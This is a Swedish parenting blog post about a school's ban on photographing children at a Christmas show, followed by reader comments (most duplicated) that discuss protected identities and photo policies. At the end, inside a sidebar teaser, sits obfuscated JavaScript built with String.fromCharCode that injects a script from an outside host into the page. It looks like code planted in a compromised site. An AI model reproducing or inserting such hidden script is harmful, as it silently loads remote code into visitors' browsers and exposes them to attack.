Fotoförbud och bildrättigheter…

IMG_0088

Hej på dig!

Oj vilken dag! Började med lämning av Lilleman i skolan. Sen vidare in mot stan och Kalmar-frun. Kaffe och mys en stund. Vidare mot ett ganska jobbigt möte. Mentalt. För att sedan möta upp kalmar-frun igen. Lunch och lite mer kaffe… Tjej och mamma snack.. 

 

IMG_0118

OLYMPUS DIGITAL CAMERA

Fick ett mail av min portal att bloggen legat nere och strulat till och från under dagen. Sorry för det. Dom jobbar prioriterat på det. Fungerar det att kommentera igen? Det gjorde nämligen inte det.

Testa gärna….. =)

IMG_0117

 

IMG_0103

Hämtade lilleman, åkte hem. Åt middag och myste en stund innan kvällens julfest på skolan.

-Som han längtat efter denna!

Han fick öppna sin andra julkalender som jag råkade glömma kvar nere på öland när vi var i Stockholm.  Nöjd kille kan man säga… 12 luckor och lego starwars.

I år blev det inegn choklad/godis kalender. Han fick enBamse klander med böcker, som ska hjälpa läsningen framåt =) Och bli en rolig vardags rutin med läsning och puzzel. Plus lego kalendern för att han älskar just lego… 

OLYMPUS DIGITAL CAMERA

IMG_0116

En glad, och lite övertrött tomtenisse följde med hem efter sin egna julshow.

Han var så glad. Dom sjöng och gick som små tomtenissar på tå inför oss föräldrar. Alla barnen var SÅ duktiga!!!!

 Sedan fikade vi gemensamt. Våran skola hade satt up en regel, vi fick inta ta några bilder på barnen när dom sjöng… Inte en enda! Alltså fotoförbud.

SÅ sorgligt ochsynd för barnen egna skull om inte annat… =( 

Rädslan hade kommit från någon förälder att dessa bilder skulle spridas på nätet.

Men kära nån tänkte jag för mig själv. Man FÅR INTE lägga upp bilder på andras barn utan tillåtelse. Vet man inte det, idag 2017 när sociala medier på gott och ont är en stor del av våran vardag?

Märkligt. 

Eftersom att jag bloggar proffesionellt så VET jag detta… jag förstår och respekterar känslan såklart…

Men tycker att det är så synd då barnen får oförglömliga minnen genom sin barndom med just denna typen av bilder ifrån när dom övat på sånger, stolta och kanske lite nervösa gjort sina framträdanden. Jag brukar även filma så att Lilleman och jag kan ta fram och titta på det då och då. Alltså bara vi, inte bloggen, fb, eller instgaram. jag kanske låter fånig nu, men jag brukar framkalla bilder och göra fotokollage till Ludvig. Jag vill att han sk aha det när han blir stor. Kunna titta, bläddra tillbaka och minnas. Men det kanske är ”ute” att göra så nuförtiden… ? 

kanske finns det en förklaring till detta. Kanske inte.

Det varierar såklart från skola till skola.

-Hur ser det ut på dina barns skola eller förskola?

Berätta gärna, jag är jätte nyfiken =) 

Jag själv har olika erfarenheter kring detta. På Kids 2 Home, i Sigtuna där Ludvig gått tidigare så fotade dom barnen dagligen.

Alla barn fick se bilden spå sig själva och på sina kamrater från dagen som gått. På eftermiddagen visade man upp dessa gemensamt….

Vid terminssluten fick vi föräldrar ladda ner dessa på egna usb, OM vi ville.

Plus att vi alla fick jätte fina mappar med härliga bildkollage från hela terminen. Det blir ju riktiga minnen som barne får behålla. Plus att Kids 2 home hade en privat (dvs en stängd)  instgram för oss alla föräldrar så att vi även fick uppdateringar på vad barnen gjorde löpande under dagen..  

Jag gillade det skarpt! 

IMG_0115

Ikväll kom vi i säng lite senare än vanligt. Vi tittade på adventskalender och poppade popcorn innan Lilleman somnade. Resten av dagen ska jag ägna mig åt att plugga.

Vi hörs imorgon fina du! Tack för att du finns… 

/ My Martens 

 

 

44 Komentarer

 1. Kan finnas barn m skyddat identitet och alla föräldrar har kanske inte godkänt att deras barn får vara med på foto. Ganska vanligt m fotoförbud på Lucia.

  • Precis…. så kan det vara. Men då blir man informerad om just det. Ändå trist att det ser ut som det gör idag. Att man ska. Själva vara ”rädd” för att inte vuxna föräldrar kam ta ansvar och INTE låta foton från avslutningar, högtider och framträdanden stanna i barnens rum tex…

 2. Fotoförbud här oxå… men fsk har en app, Pluttra, som föräldrarna har godkännt. Där läggs det upp bilder på vad barnen gör om dagarna, sååå kul att se och följa deras utveckling?

 3. Kan finnas barn m skyddat identitet och alla föräldrar har kanske inte godkänt att deras barn får vara med på foto. Ganska vanligt m fotoförbud på Lucia.

  • Precis…. så kan det vara. Men då blir man informerad om just det. Ändå trist att det ser ut som det gör idag. Att man ska. Själva vara ”rädd” för att inte vuxna föräldrar kam ta ansvar och INTE låta foton från avslutningar, högtider och framträdanden stanna i barnens rum tex…

 4. Fotoförbud här oxå… men fsk har en app, Pluttra, som föräldrarna har godkännt. Där läggs det upp bilder på vad barnen gör om dagarna, sååå kul att se och följa deras utveckling💙

 5. Ang att fotografera på dagis, osv så kan det ju vara så att en del barn lever skyddade, och tyvärr respekterar inte alla att inte lägga ut bilder på andras barn.
  Där jag varit på firande har man fått ta kort och jag har även lagt ut men då ”suddat” eller beskurit så bara ”mina” synts.
  Men jag tycker självklart det är synd att man INTE får ta kort, men sen det du skriver att barnen vill ha det, tjo kanske en kort period men sen när de blir äldre/vuxna har de inget som helst intresse av att vare sig se eller höra sig själva.
  Man kan ju ta kort av just sitt eget barn, klädda i det de har på sig vid det speciella tillfället, men att tro att ungarna vill ha det sen, …… det blir inte så.
  Det kommer att bli liggande i nåt skåp hemma hos mamma / pappa och sen när den tiden kommer så kommer det slängas bort.
  Det är VI föräldrar som vill ha allt sparat ?

 6. Ang att fotografera på dagis, osv så kan det ju vara så att en del barn lever skyddade, och tyvärr respekterar inte alla att inte lägga ut bilder på andras barn.
  Där jag varit på firande har man fått ta kort och jag har även lagt ut men då ”suddat” eller beskurit så bara ”mina” synts.
  Men jag tycker självklart det är synd att man INTE får ta kort, men sen det du skriver att barnen vill ha det, tjo kanske en kort period men sen när de blir äldre/vuxna har de inget som helst intresse av att vare sig se eller höra sig själva.
  Man kan ju ta kort av just sitt eget barn, klädda i det de har på sig vid det speciella tillfället, men att tro att ungarna vill ha det sen, …… det blir inte så.
  Det kommer att bli liggande i nåt skåp hemma hos mamma / pappa och sen när den tiden kommer så kommer det slängas bort.
  Det är VI föräldrar som vill ha allt sparat 😉

 7. Man får alltid en lapp i början på terminen där man fyller i om man får lov att filma fota ens barn. Om de har som policy att de inte fotar , filmar ska de även informera om detta. Konstigt tycker jag. Gäller det även vid skolavslutning? Ta upp det med dom tycker jsg.

 8. Här är det fotoförbud och det tas heller inga skolfoton längre. Kan väl kännas både bu och bä, men det är för det mesta rätt beslut tycker jag.
  Foton och fotokatalogen är fruktansvärt dyra så det är många familjer som ej har råd men tar sina sista slantar till det för barnets skull, så vill ju barnen ha varsin egen katalog och då kan det kan dyrt för familjen.
  Ha en fin Lucia i alla fall My !

 9. Man får alltid en lapp i början på terminen där man fyller i om man får lov att filma fota ens barn. Om de har som policy att de inte fotar , filmar ska de även informera om detta. Konstigt tycker jag. Gäller det även vid skolavslutning? Ta upp det med dom tycker jsg.

 10. Hej My!
  Vad härligt med julfest! En viktig anledning till fotoförbud är att det finns tyvärr ganska många som lever under skyddad identitet. Tror att de flesta idag vet att man inte får lägga ut bilder utan att be om tillstånd, men man kan aldrig garantera att alla som fotar följer det. Har arbetat i skola många år, och själv varit med om att en familj som levt med skyddsbehov blivit hittad av väldigt olämpliga personer, som därmed varit förenat med livsfara för dem , tyvärr…..
  Passar på att önska er en riktigt god jul !

 11. Här är det fotoförbud och det tas heller inga skolfoton längre. Kan väl kännas både bu och bä, men det är för det mesta rätt beslut tycker jag.

  Foton och fotokatalogen är fruktansvärt dyra så det är många familjer som ej har råd men tar sina sista slantar till det för barnets skull, så vill ju barnen ha varsin egen katalog och då kan det kan dyrt för familjen.
  Ha en fin Lucia i alla fall My !

 12. Hej My!
  Vad härligt med julfest! En viktig anledning till fotoförbud är att det finns tyvärr ganska många som lever under skyddad identitet. Tror att de flesta idag vet att man inte får lägga ut bilder utan att be om tillstånd, men man kan aldrig garantera att alla som fotar följer det. Har arbetat i skola många år, och själv varit med om att en familj som levt med skyddsbehov blivit hittad av väldigt olämpliga personer, som därmed varit förenat med livsfara för dem , tyvärr…..
  Passar på att önska er en riktigt god jul !

 13. Hos mina barnbarn får man ta kort men inte lägga ut. En självklarhet. Tycker som du att man vill ha minnen.för sina barn och en själv. Och varje vuxens sunda förnuft att man inte lägger ut nått på nätet ifall. Sen har dagis e en egen låst sida där föräldrar får titta på bilder vad som hänt för kul under Dan. Med eget lösenord mm
  . Trevlig Lucia

 14. Hos mina barnbarn får man ta kort men inte lägga ut. En självklarhet. Tycker som du att man vill ha minnen.för sina barn och en själv. Och varje vuxens sunda förnuft att man inte lägger ut nått på nätet ifall. Sen har dagis e en egen låst sida där föräldrar får titta på bilder vad som hänt för kul under Dan. Med eget lösenord mm
  . Trevlig Lucia

 15. Fast jag håller inte riktigt med här. Jag kan tycka att det är rätt befriande att lägga ifrån sig Mobil/kamera i den bemärkelse att man blir 100 % närvarande i showen. Ibland blir man så upptagen med att ta bra bilder så man missar att bara luta sig tillbaka och ta in och njuta av barnens föreställning. Ta in stunden så att säga. ? sen kan man ju ta nån bild efter på sitt barn om man vill. Men jag förstår absolut din tanke att det är värdefullt att ha bilder och minnas tillbaka till men jag tycker ändå att det är skönt att bara vara i stunden och koppla bort kameran.

 16. Fast jag håller inte riktigt med här. Jag kan tycka att det är rätt befriande att lägga ifrån sig Mobil/kamera i den bemärkelse att man blir 100 % närvarande i showen. Ibland blir man så upptagen med att ta bra bilder så man missar att bara luta sig tillbaka och ta in och njuta av barnens föreställning. Ta in stunden så att säga. 🙂 sen kan man ju ta nån bild efter på sitt barn om man vill. Men jag förstår absolut din tanke att det är värdefullt att ha bilder och minnas tillbaka till men jag tycker ändå att det är skönt att bara vara i stunden och koppla bort kameran.

 17. Vi bor ju i USA så jag var inte alls uppdaterad på hur det har utvecklats med detta i Sverige. Låter jättecoolt, verkligen, som ni hade på din sons förra skola med fotokollage, sluten Instagram mm – det är ju verkligen skönt att se som förälder om man t ex jobbar långa dagar och undrar hur barnen har det. Men att vissa skolor inte längre har ens skolfoto eller fotokatalog känns ju konstigt… Men det är väl den moderna utvecklingen antar jag ? Vi bor på östkusten i USA, här är skolfoto och fotokatalog och man får både ta foto och filma i skolan… Håller med dom som skrev att det är väldigt farligt för dom med skyddad identitet – jag undrar hur man verkligen säkerställer att dom aldrig kommer med på nåt foto från skolaktiviteter som föräldrar tar… Kul att höra hur ni har det och tack för superbra blogg.

 18. Vi bor ju i USA så jag var inte alls uppdaterad på hur det har utvecklats med detta i Sverige. Låter jättecoolt, verkligen, som ni hade på din sons förra skola med fotokollage, sluten Instagram mm – det är ju verkligen skönt att se som förälder om man t ex jobbar långa dagar och undrar hur barnen har det. Men att vissa skolor inte längre har ens skolfoto eller fotokatalog känns ju konstigt… Men det är väl den moderna utvecklingen antar jag 🙂 Vi bor på östkusten i USA, här är skolfoto och fotokatalog och man får både ta foto och filma i skolan… Håller med dom som skrev att det är väldigt farligt för dom med skyddad identitet – jag undrar hur man verkligen säkerställer att dom aldrig kommer med på nåt foto från skolaktiviteter som föräldrar tar… Kul att höra hur ni har det och tack för superbra blogg.

 19. Jag jobbar på förskola i Sigtuna kommun. Här råder det film och fotoförbud på alla kommunala förskolor och skolorna har också börjat ta efter det. Och detta med hänsyn till de som lever under skyddad identitet bla. Men vi pedagoger får filma och fota för dokumentation som alla kan ta del av. Vet att många tycker det är synd/ tråkigt och jag förstår det men med tanke på det samhälle vi lever i idag så måste vi ta till sådana saker för att skydda barnen och göra vad vi kan.
  / Nettan

  • Ja Nettan… Jag håller med, det är en självklarhet om man lever med skyddad identitet. Men om INTE så är fallet. Ska man ändå införskaffa foto/förbud? Trots att det inte finns barn/familjer me skyddad identitet? Jag personligen tycker att det är fel. jag tycker att det sänder FEL signaler till barnen. jag förväntar mig att man som förälder 2017 ska förstå, att man inte ska publicera bilder på andras barn på våra sociala medier oavsett om man är som jag offentlig eller inte. DET är det vi ska förmedla till våra barn. sociala medier kommer inte försvinna, vi måste därför lära oss att hantera det. Tänka på konsekvenser och lära ut detsamma till våra små..
   Det hör till sundt förnuft att kunna ta ansvara för just det som förälder/morförälder. Ludvig har fina bilder ifrån alla tidigare julfester och avslutningar… Fram tills nu… Lite tråkigt tycker jag nog ändå att det är… / My

   • Jag tycker också det är tråkigt, har själv barn, men vi gör som sagt vad vi kan och det finns många föräldrar som inte vill att andra fotar deras barn av olika anledningar, inte bara pga skyddad identitet.

   • Tack My. Så rätt du har. Att respektera andra och deras åsikter, lära våra barn om bra sätt att hantera sociala medier utan att hänga ut någon. Gå in och läs andra tankar hos annorlundafailjen Carola, dem gillade jag inte alls. Tack My för detta svar bland kommentarerna.

 20. Jag jobbar på förskola i Sigtuna kommun. Här råder det film och fotoförbud på alla kommunala förskolor och skolorna har också börjat ta efter det. Och detta med hänsyn till de som lever under skyddad identitet bla. Men vi pedagoger får filma och fota för dokumentation som alla kan ta del av. Vet att många tycker det är synd/ tråkigt och jag förstår det men med tanke på det samhälle vi lever i idag så måste vi ta till sådana saker för att skydda barnen och göra vad vi kan.
  / Nettan

  • Ja Nettan… Jag håller med, det är en självklarhet om man lever med skyddad identitet. Men om INTE så är fallet. Ska man ändå införskaffa foto/förbud? Trots att det inte finns barn/familjer me skyddad identitet? Jag personligen tycker att det är fel. jag tycker att det sänder FEL signaler till barnen. jag förväntar mig att man som förälder 2017 ska förstå, att man inte ska publicera bilder på andras barn på våra sociala medier oavsett om man är som jag offentlig eller inte. DET är det vi ska förmedla till våra barn. sociala medier kommer inte försvinna, vi måste därför lära oss att hantera det. Tänka på konsekvenser och lära ut detsamma till våra små..

   Det hör till sundt förnuft att kunna ta ansvara för just det som förälder/morförälder. Ludvig har fina bilder ifrån alla tidigare julfester och avslutningar… Fram tills nu… Lite tråkigt tycker jag nog ändå att det är… / My

   • Jag tycker också det är tråkigt, har själv barn, men vi gör som sagt vad vi kan och det finns många föräldrar som inte vill att andra fotar deras barn av olika anledningar, inte bara pga skyddad identitet.

   • Tack My. Så rätt du har. Att respektera andra och deras åsikter, lära våra barn om bra sätt att hantera sociala medier utan att hänga ut någon. Gå in och läs andra tankar hos annorlundafailjen Carola, dem gillade jag inte alls. Tack My för detta svar bland kommentarerna.

 21. Hej,
  Jag förstår ditt perspektiv men du bör ha i beaktning att det finns barn som lever under skyddad identiteter samt att vuxna individer inte följer fotoförbud. Konsekvensen blir därmed totalt fotoförbud.

 22. Hej,

  Jag förstår ditt perspektiv men du bör ha i beaktning att det finns barn som lever under skyddad identiteter samt att vuxna individer inte följer fotoförbud. Konsekvensen blir därmed totalt fotoförbud.

 23. Man informerar ju aldrig om att man själv/någon i klassen lever med skyddad identitet. Just för att det är mycket större risk att bli hittad. Det är vanligare än man tror att barn/familjer lever så. Vi gör aldrig skillnad på klasserna som har barn lever med skyddad identitet och de som inte har det, då blir det också lättare att hitta de barn som har skyddad identitet. ”Alla klasser utom en fick fota, måste finnas någon som skyddas i den klassen”. Ibland vet vi personal inte ens om att någon skyddas. Regeln finns för människors säkerhets skull. Du ställer frågan varför man har fotoförbud trots att någon inte lever med skyddad identitet..du vet inte att någon inte gör det på din sons skola. Och rent hypotetiskt, hade ingen i Sverige gjort det så hade fotoförbud på skolor och förskolor inte blivit vanligare och vanligare.
  Det är såklart tråkigt flr dig som inte får ta kort, men det är tråkigare för skyddade familjer som ev blir avslöjade/hittade pga foton. Och nej, man bör inte sprida bilder på andra människor..men så tänker inte alla och det finns inget sätt att hålla koll på vad alla föräldrar gör med bilderna efteråt, därav fotoförbud för att säkerställa barns trygghet. Och den måste ju gå först.

 24. Man informerar ju aldrig om att man själv/någon i klassen lever med skyddad identitet. Just för att det är mycket större risk att bli hittad. Det är vanligare än man tror att barn/familjer lever så. Vi gör aldrig skillnad på klasserna som har barn lever med skyddad identitet och de som inte har det, då blir det också lättare att hitta de barn som har skyddad identitet. ”Alla klasser utom en fick fota, måste finnas någon som skyddas i den klassen”. Ibland vet vi personal inte ens om att någon skyddas. Regeln finns för människors säkerhets skull. Du ställer frågan varför man har fotoförbud trots att någon inte lever med skyddad identitet..du vet inte att någon inte gör det på din sons skola. Och rent hypotetiskt, hade ingen i Sverige gjort det så hade fotoförbud på skolor och förskolor inte blivit vanligare och vanligare.
  Det är såklart tråkigt flr dig som inte får ta kort, men det är tråkigare för skyddade familjer som ev blir avslöjade/hittade pga foton. Och nej, man bör inte sprida bilder på andra människor..men så tänker inte alla och det finns inget sätt att hålla koll på vad alla föräldrar gör med bilderna efteråt, därav fotoförbud för att säkerställa barns trygghet. Och den måste ju gå först.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/